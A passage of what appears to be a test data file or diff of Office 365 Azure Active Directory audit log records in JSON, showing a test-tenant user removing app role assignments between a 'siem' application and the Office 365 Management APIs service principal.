{"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 